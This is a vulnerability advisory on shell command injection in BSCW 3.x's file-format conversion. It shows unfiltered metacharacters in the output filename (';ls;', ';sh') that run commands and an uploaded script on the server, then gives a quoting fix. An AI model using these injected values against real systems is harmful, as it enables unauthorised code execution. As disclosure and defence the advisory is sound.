COMMAND

	BSCW meta character escape allows script execution

SYSTEMS AFFECTED

	All 3.x versions of BSCW running under Unix like OS.
	

	Version 4 not tested (probably vulnerable too. edit: Bug has been  fixed
	in the 21. Dec. Version 4 release).
	

	Depending on how external programs are called under Windows,  a  similar
	vunerability may exist in BSCW for Windows.

PROBLEM

	Thomas Seliger reported :
	

	The BSCW system gives the users the possibility to  convert  files  into
	other formats (e.g. GIF into JPEG). This is  done  by  calling  external
	tools. The user can enter the filename of the converted file. Since  the
	user input is handed as parameter to the external  programs,  which  are
	called via a shell, shell meta characters should be filtered out of  the
	user input. Most of them are filtered by  BSCW,  but  there  are  a  few
	which aren\'t:
	

	&;^()[]{}

	

	The dangerous characters are \"&\",\";\",\"^\".  I\'ll  explain  the
	vulnerability, using the conversion of a JPEG to a GIF as example:
	

	After you have set your skill level in your userprofile  to  \"Expert\",
	you have the ability  to  convert  certain  file  formats  into  another
	format. BSCW achieves this by calling external helper tools.
	

	Lets say we have a file \"test.jpg\" in  a  folder  we  can  access.  We
	click on the \"convert\" option. In the following dialog we  choose  our
	settings for the conversion, we select \"GIF\" and \"no  encoding\".  We
	can enter the name of the outputfile also, the default is the  the  name
	of the file (\"test.jpg\"  in  our  case).  We  dont  change  the  name.
	Hitting the convert button gives you a file named \"test.gif\".
	

	Now we enter some shell meta characters as file name:
	

	\"\'`/\\|<>*?&;^()[]{}

	

	And get an output similar like this:
	

	Some text that the conversion wasnt successfully.
	

	(

	/bin/X11/djpeg -gif -outfile /BSCW/Tmp/@8279_1/&;^()[]{}

	/BSCW/Tmp/@8279_1/@8279_2

	) 2>&1

	.

	

	This is the output of the shell call which the BSCW system did.  Looking
	at the metachars you can see that \"\'`\\|<>*?  are  filtered,  while
	&;^()[]{} are not. The  @8279_1  and  @8279_2  are  internal  object
	reference codes that BSCW creates. Now we use ;ls; as file name for  the
	conversion (; is the command  separator  for  shell  commands),  we  get
	something like:
	

	/bin/X11/djpeg: can\'t open /BSCW/Tmp/@8558_1/

	@8558_2

	sh: /BSCW/Tmp/@8558_1/@8558_2: cannot execute

	(

	/bin/X11/djpeg -gif -outfile /BSCW/Tmp/@8558_1/;ls;

	/BSCW/Tmp/@8558_1/@8558_2

	) 2>&1

	.

	

	We executed the \"ls\" command  (output  is  \"/BSCW/@8558_1/@8558_2\").
	So there is one file in this temporary directory, which is in  fact  our
	\"test.jpg\" file. Then we get the \"cannot execute\" error,  since  the
	shell tries to execute \"/BSCW/Tmp/@8558_1/@8558_2\"  (we  separated  it
	in the commandline by \";\").
	

	Now we create our exploit shell script:
	

	echo code executed on webserver

	uname -a

	

	We use \"test.jpg\" as name for this script and upload it  on  the  BSCW
	server, setting the  MIME  type  to  \"jpeg\"  manually  in  the  upload
	dialog. Since the BSCW creates the temp file for conversion without  the
	exec bit set, we have to execute by calling the shell with the  file  as
	argument. We do this by giving \";sh\" as file name  for  the  converted
	file:
	

	/bin/X11/djpeg: can\'t open /BSCW/Tmp/@9586_1/

	code executed on bscw server:

	SunOS marin 5.8 Generic_111848-01 sun4u sparc SUNW,Ultra-4

	(

	/bin/X11/djpeg  -gif -outfile /BSCW/Tmp/@9586_1/;

	sh /BSCW/Tmp/@9586_1/@9586_2

	) 2>&1

	.

	

SOLUTION

	The configuration for calling external conversion programs  are  in  the
	file \"config_converters.py\", located  in  the  \"/src\"  directory  of
	your BSCW installation.  It  contains  one  entry  for  each  conversion
	possibility (gif->jpeg, jpeg->gif,  gif->ps  ...).  Those  Entries  look
	like this:
	

	# JPEG -> GIF  (0.8)

	 (\'image/jpeg\', \'image/gif\', \'0.8\',

	  \'/usr/bin/X11/djpeg  -gif -outfile %(dest)s %(src)s\',

	  \'Colors, if more than 256\'),

	

	Change it to:
	

	# JPEG -> GIF  (0.8)

	 (\'image/jpeg\', \'image/gif\', \'0.8\',

	  \'/usr/bin/X11/djpeg  -gif -outfile \"%(dest)s\" \"%(src)s\"\',

	  \'Colors, if more than 256\'),

	

	Do this for all the conversion programs. That way parameters are  quoted
	and not interpreted.